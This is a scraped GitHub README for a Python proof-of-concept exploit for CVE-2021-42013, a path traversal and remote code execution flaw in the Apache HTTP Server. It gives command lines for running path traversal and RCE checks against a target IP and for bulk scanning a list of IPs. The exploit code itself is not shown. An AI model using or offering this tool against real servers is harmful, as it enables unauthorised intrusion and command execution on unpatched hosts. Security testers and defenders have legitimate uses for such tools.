Skip to content

Latest commit

 

History

History
35 lines (30 loc) · 1023 Bytes

README.md

File metadata and controls

35 lines (30 loc) · 1023 Bytes

Usage cve-2021-42013.py

Check for Path Traversal and Remote Code Execution

$ python3 exploit.py -u http://172.17.0.2

Path Traversal PoC

$ python3 exploit.py -u http://172.17.0.2 -pt

Remote Code Execution PoC

$ python3 exploit.py -u http://172.17.0.2 -rce

For bulk scanning, provide a text file containing IPs:

$ python3 exploit.py -l list.txt
$ python3 exploit.py -l list.txt -pt
$ python3 exploit.py -l list.txt -rce

More information can be found here.

References